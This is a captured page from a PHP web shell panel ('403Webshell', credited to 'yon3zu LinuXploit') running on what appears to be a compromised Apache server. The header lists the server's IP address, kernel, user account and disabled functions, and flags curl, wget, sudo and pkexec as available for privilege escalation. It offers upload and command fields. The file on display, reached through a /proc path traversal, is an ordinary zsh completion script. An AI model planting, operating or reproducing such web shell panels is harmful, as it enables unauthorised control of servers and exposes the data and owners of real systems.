403Webshell
Server IP : 51.89.169.208  /  Your IP : 216.73.216.94
Web Server : Apache
System : Linux ns3209505.ip-198-244-202.eu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Tue Nov 5 04:50:16 EST 2024 x86_64
User : yellowleaf ( 1019)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/thread-self/root/proc/thread-self/root/usr/share/zsh/5.5.1/functions/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/thread-self/root/proc/thread-self/root/usr/share/zsh/5.5.1/functions/_regex_words
#autoload

local opt OPTARG matches end
local term=$'\0'

while getopts "t:" opt; do
  case $opt in
    (t)
    term=$OPTARG
    ;;

    (*)
    return 1
    ;;
  esac
done
shift $(( OPTIND - 1 ))

local tag=$1
local desc=$2
shift 2

if (( $# )); then
  reply=(\()
else
  # ### Is this likely to happen in callers?  Should we warn?
  reply=()
  return
fi

integer i
local -a wds

if [[ $term = $'\0' ]]; then
  matches=":${tag}:${desc}:(( "
  end="))"
else
  matches=":${tag}:${desc}:_values -s ${(q)term} ${(q)desc}"
fi

for (( i = 1; i <= $#; i++ )); do
  wds=(${(s.:.)argv[i]})
  reply+=(/${wds[1]//\**/"[^$term]#"}"$term"/)
  if [[ $term = $'\0' ]]; then
    matches+="${wds[1]//\*}${wds[2]:+\\:${wds[2]//(#m)[: \(\)]/\\$MATCH}} "
  else
    matches+=" ${(q)${${wds[1]//\*}//(#m)[:\[\]]/\\$MATCH}}\\[${(q)${wds[2]//(#m)[:\[\]]/\\$MATCH}}\\]"
  fi
  eval "reply+=($wds[3])"
  reply+=(\|)
done
reply+=( /'[]'/ "${matches}${end}" \) )

Youez - 2016 - github.com/yon3zu
LinuXploit